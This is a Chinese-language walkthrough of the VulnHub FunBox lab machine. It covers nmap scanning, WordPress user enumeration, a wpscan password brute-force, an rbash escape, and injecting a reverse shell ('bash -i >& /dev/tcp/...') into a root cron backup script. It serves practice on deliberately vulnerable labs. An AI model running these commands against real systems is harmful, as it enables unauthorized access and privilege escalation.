发现目标主机
我们使用nmap扫描整个网段
sudo nmap 192.168.1.0/24
扫描端口
使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口
sudo nmap -A 192.168.1.14
使用IP访问时发现会跳转到funbox.fritz.box
域名,我们需要再hosts文件中加入映射关系才能正常访问
添加之后通过域名访问发现这是一个WordPress搭建的网站
我们先用wpscan扫描一下用户,得到admin和joe两个用户
sudo wpscan --url http://funbox.fritz.box/ --enumerate u
我们创建一个用户字典然后进行密码爆破
sudo wpscan --url http://funbox.fritz.box/ -U ~/Desktop/VulnHub/FunBox/username -P /usr/share/wordlists/rockyou.txt
得到密码之后,由于服务器开放了22端口,我们先连接服务器试试
ssh joe@192.168.1.14
我们发现joe用户可以成功连接到服务器
但是,当我们想切换到其他目录的时候,发现这是一个受限的rbash
使用bash -i
即可绕过限制
我们查看joe家目录下的mbox文件发现了一句提示语,在funny的家目录下有一个备份脚本,让我们告诉他完成了。
Hi Joe, please tell funny the backupscript is done.
进入funny的家目录我们发现本脚本是一个隐藏文件
查看脚本内容即是将var/www/html备份到funny的家目录下
查看了一下时间发现文件最后修改时间和现在时间进行对比,这应该是一个定时执行的脚本
通过观察脚本差不多2-5分钟执行一次,我们在脚本里写入一个反弹shell
bash -i >& /dev/tcp/192.168.1.6/1234 0>&1
等几分钟即可返回一个shell
通过观察funny权限脚本1分钟执行一次,root权限5分钟执行一次,所以如果返回的不是root权限可以多试几次
查看Flag
福利来啦
加入我的星球
下方查看历史文章
VulnHub之DC-1
VulnHub之DC-2
VulnHub之DC-3
VulnHub之DC-4
VulnHub之MuzzyBox
【工具分享】AWVS 12 汉化激活成功教程版
通达OA任意上传&文件包含漏洞复现
扫描二维码
获取更多精彩
NowSec
今天的文章VulnHub_FunBox[通俗易懂]分享到此就结束了,感谢您的阅读,如果确实帮到您,您可以动动手指转发给其他人。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/57942.html